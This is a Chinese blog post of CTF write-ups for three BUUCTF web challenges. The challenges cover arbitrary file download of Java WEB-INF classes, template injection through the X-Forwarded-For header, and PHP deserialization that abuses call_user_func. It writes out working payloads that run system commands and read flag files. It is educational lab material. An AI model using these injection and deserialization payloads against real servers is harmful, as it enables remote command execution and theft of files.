BUUCTF Web [RoarCTF 2019]Easy Java1 & [BJDCTF2020]The mystery of ip1 & [网鼎杯 2020 朱雀组]phpweb1

已于 2023-05-30 11:16:25 修改
阅读量250 收藏
点赞数 1
分类专栏: BUUCTF Web 文章标签: 安全
于 2022-09-18 12:13:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126914473
版权

目录

 

[RoarCTF 2019]Easy Java1

​编辑

[BJDCTF2020]The mystery of ip1

[网鼎杯 2020 朱雀组]phpweb1

 

[RoarCTF 2019]Easy Java1

启动靶机

a0c4b33f3d5841ed9a649f9e251a38fb.bmp

 尝试一些弱口令,万能密码,发现都不可行。点击help

fdf0d1a68c4c4c36a5c473750d977fc3.png

观察此页面的url

39b69232796340109e3f8fe05b94ddd0.png

对于我这种java不太好的,似乎没啥思路了,看了看大佬的wp

这道题利用的任意下载漏洞,打开hackbar,使用POST传参

a3b5e167bcd54d7fa2a9640e3a0a14d5.png

打开这个文件看一看,发现了一个与flag相关的

f9282078f42847eda95c13cc73abd64b.png

 构造路径访问一下

filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

 下载完后,使用java在线反编译(JAVA反向工程网),下载反编译后的文件

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(
   name = "FlagController"
)
public class FlagController extends HttpServlet {

   String flag = "ZmxhZ3tmY2QwZmRhOC1hYWFkLTQ1YTAtOTZkZS1kYWFkZGI2ZTdhZjJ9Cg==";


   protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
      PrintWriter var3 = var2.getWriter();
      var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
   }
}

可以看到一行flag

c52d4c83e5a646d48765dbcb846e7948.png

复制到base64在线解密中

ad61466cefea4521b80c475aed9a4c67.png

拿到flag               flag{fcd0fda8-aaad-45a0-96de-daaddb6e7af2} 

[BJDCTF2020]The mystery of ip1

启动靶机

f9430a7f890f43119a1996439f4f7177.png

发现左上角三个标签,点击Flag

9ff0e2aefb46441284e71e04067f8098.png

直接返回了一个ip地址,但是我的ip与页面返回的并不相同。

看来需要抓包改ip尝试了,启动burp,点击Flag,抓一下包

增加X-Forwarded-For,重放

X-Forwarded-For:127.0.0.1

6829d8d8b8904844bbcbc184c7fabc18.png

猜测XFF处可能存在命令执行

X-Forwarded-For:{{system(whoami)}}

69692b12fdfe4d8586a934d4b2ce7514.png

 既然可以命令执行,直接读/flag

X-Forwarded-For:{{system('cat /flag')}}

 3593c50bb2ef401bae06c30019753e79.bmp

 Forward放包

8a578bc219b6414eb941f7764e21b83b.png

拿到flag                  flag{1dda6480-b436-4dcd-8ab8-5d0c32943cb3}  

[网鼎杯 2020 朱雀组]phpweb1

启动靶机,又是熟悉的笑川(大头照就不截了)。

右键看一下源码,js中每隔五秒自动刷新。

还没什么思路,抓个包看看吧

01ffac5f6d684a48bc73353f5267f0ff.png

发现POST穿了两个参数,这应该是与call_user_func()函数有关。

传参查看index.php的源码

func=file_get_contents&p=index.php

9ef4a638ff92480ab871c1f8e2e79a13.png

发现了一段序列化的内容

   class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }

 编写脚本

<?php
class Test {
    var $p = "whoami";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$a=new Test();
echo serialize($a);

?>

复制到php在线编译中

341b54130e524481bf20b8c8ae874582.png

 拿到序列化的结果,构造payload

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:6:"whoami";s:4:"func";s:6:"system";}

b6adc7100b0740b4b3e6358768005995.png

发现whoami可以成功执行,直接构造payload来查看/flag

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:9:"cat /flag";s:4:"func";s:6:"system";}

7a4abea4958d4a50943350cb0d1ad5f0.png

发现无任何回显,看来flag不在/flag中,构造payload查找flag在哪 (需要遍历查找,所以请求时间会长一点)

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

8f56436771a34edca6ac97664efa9626.png

 盲猜flag放在最短的文件中,构造payload

func=readfile&p=/tmp/flagoefiu4r93

38fcf51d1e384267bc6fa41bfe718c39.png

拿到flag           flag{8c3bc62f-357b-4e25-bb79-ac92e34b7267} 

这道题主要考察了call_user_func()函数如何去调用系统命令,感兴趣的可以看一看这篇文章

 

WmVicmE=
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buu做题笔记——[网鼎杯 2020 朱雀]phpweb&[SWPU2019]Web1
weixin_46330722的博客
11-06 1404
BUU[网鼎杯 2020 朱雀]phpweb [网鼎杯 2020 朱雀]phpweb 页面看不出啥,抓个包看看。 从包中我们可以看到,传递了两个参数,func和p。func的值是date,再结合p的值,我猜测这里是用了call_user_func()来回调函数,即将func的值当作函数名,p的值当作参数。那么我们直接使用system函数查看当前目录下的文件 回显Hacker,应该是被waf拦了,用highlight_file()看一下源码 <?php $disable_fun = arr
The Mystery of Legend-开源
06-28
一个关于传奇之谜的游戏,艾伦需要点燃它。 JRPG风格的游戏。
WEB-INF 基础知识
王嘟嘟的博客
04-08 5334
0x00 前言 对WEB-INF进行一个简单的了解。 0x01 正文 WEB-INF是javaWEB应用的安全目录。 1.WEB-INF目录 WEB-INF/web.xml web应用程序配置文件,描述了servlet和其他的应用件配置及命名规则。 WEB-INF/classes 包含了站点所有用的class文件,包括servlet class和非servlet class WEB-INF/...
BUUCTF】[RoarCTF 2019]Easy Java1
最新发布
qq_44724114的博客
05-08 513
和第3步一样,先hackbar通过post请求【要是再hackbar中execute不动,重新刷新该网址,如还是不行销毁靶机,重开】,进行bp抓包——send到repeater去,然后看repeater的响应。/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在.jar文件中。/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件。
buuctf——Easy-Java
weixin_46107179的博客
08-04 404
有一个help点击进去是一个java的报错信息说未找到该文件,根据观察URL,可能是文件包含,根据题目提示是java,尝试读取WEB-INF/web.xml文件 发现还是不能读取到,尝试用burp改一下请求方式,结果读取到web.xml配置文件 根据java项目的结构可以得到class文件,(一般关于java得到源码的思路:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码) /WEB-INF/web.xml:Web应用程序配置文件,描述了
WEB-buuctf-easy java
weixin_52804141的博客
01-01 240
WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。得到有一个文件,打开看一下,发现一串乱码,在仔细一看,里面又一串字符=结尾,疑似base64编码。所以构建paylod。
BUUCTF WEB EASYJAVA
qq_41696858的博客
12-06 276
回来啦,满血复活啦 遇事不决,先审源码,一个明晃晃的a标签看不起谁呢,直接点进去 java.io.FileNotFoundException:{help.docx} 忙猜文件读取漏洞,结合题目中的easyjava,猜都不用猜 javaweb里面的WEB-INF,干就完事了 WEB-INF/web.xml,哦对了,包的形式要手动改成post,为什么呢,因为上传下载这类的请求一般都是post 那么就拿到我们想要的东西了,/Flag由com.wm.ctf.FlagController进行处理 直接访问/Flag,
【精品】备考2011高效学习方案英语高三册:Units 13~14  The mystery of the Moonstone & Zoology.doc
08-19
【精品】备考2011高效学习方案英语高三册:Units 13~14 The mystery of the Moonstone & Zoology.doc
The Mystery
06-23
The Mystery Method_cn.rar
Mystery of Mobile Data Collecting AND Processing》PDF版本下载.txt
07-17
Mystery of Mobile Data Collecting AND Processing》PDF版本下载
22-郑康鹏-The Mystery Machine:End-to-end performance analysis of la
08-04
《The Mystery Machine:大型互联网服务端到端性能分析》 这篇论文出自2014年11月6日至8日在科罗拉多州布鲁姆菲尔德举行的第11届USENIX操作系统设计与实现研讨会。该研讨会的论文集由USENIX协会赞助并开放获取,...
BUUCTF:[RoarCTF 2019]Easy Java
末初的CSDN博客
11-09 1212
https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Java 登录框弱密码admin/admin888即可登录 返回登录框,在下面有个help按钮 GET传参无果,尝试修改传参方式为POST 下载下来并无flag 查看是否存在WEB-INF/web.xml泄露 明显存在,可以读取到网站源码 读取FlagController.class filename=WEB-INF/classes/com/wm/ctf/FlagController.cl
BUUCTF】[RoarCTF 2019]Easy Java
aoao331198的博客
04-17 902
点击help,发现拿不到help.docx 根据wp,这里使用hackbar发post才能拿到文件 java web 文件格式 src/main/java: 这个目录一般是存放web项目的Java源文件的 src/main/resource: 这个目录一般是存放相关的配置文件 src/main/webapp: 这个目录一般是和web应用相关的 webapp下的文件目录是容易出现安全问题的 /WEB-INF/web.xml: Web应用程序配置文件,描述了 servlet 和其他的应用件配置及命名规则 .
buuctf-[RoarCTF 2019]Easy Java JAVA WEB目录结构
2202_75317918的博客
10-02 276
找到对应文件名,然后通过这个文件名找到对应的servlet,再通过这个servlet的文件名,获取到其具体的servlet文件。因为这个是类中的文件,所以后缀要加.class。此外如果想在页面访问WEB-INF应用里面的文件,必须要通过web.xml进行相应的映射才能访问;所以我们要下载FlagController.class文件试一试。尝试直接访问/WEB-INF/web.xml,未找到文件。WEB-INF:Javaweb应用安全目录;以为是文件包含,,但是不对。使用post传参试试。
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1846
[RoarCTF 2019]Easy Java
web buuctf [RoarCTF 2019]Easy Java1
weixin_44214568的博客
03-22 2250
考点: java web.xml配置文件漏洞 漏洞:【漏洞公告】Java web.xml 信息泄漏漏洞 - 阿里云安全产品和技术 - 阿里云 漏洞产生原因:通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取 漏洞利用:通过找到web.xml文件,推断class文件的路径,最后直接cla
[RoarCTF 2019]Easy Java 1
shinygod的博客
03-01 1079
知识点:java WEB-INF/web.xml泄露 目录解析wp 解析 ctf/web源码泄露及利用办法 漏洞成因:通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class
BUUCTF刷题记录 Easy Java
m0_46576074的博客
05-20 247
[RoarCTF 2019]Easy Java 进入网址 使用burpsuite抓包 点击help 抓包 把GET改为POST 传入filename值为WEB-INF/web.xml 发现com.Wm.ctf.FlagController 然后构造payload: filename=WEB-INF/classes/com/wm/ctf/FlagController.class base64解码得flag ...
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值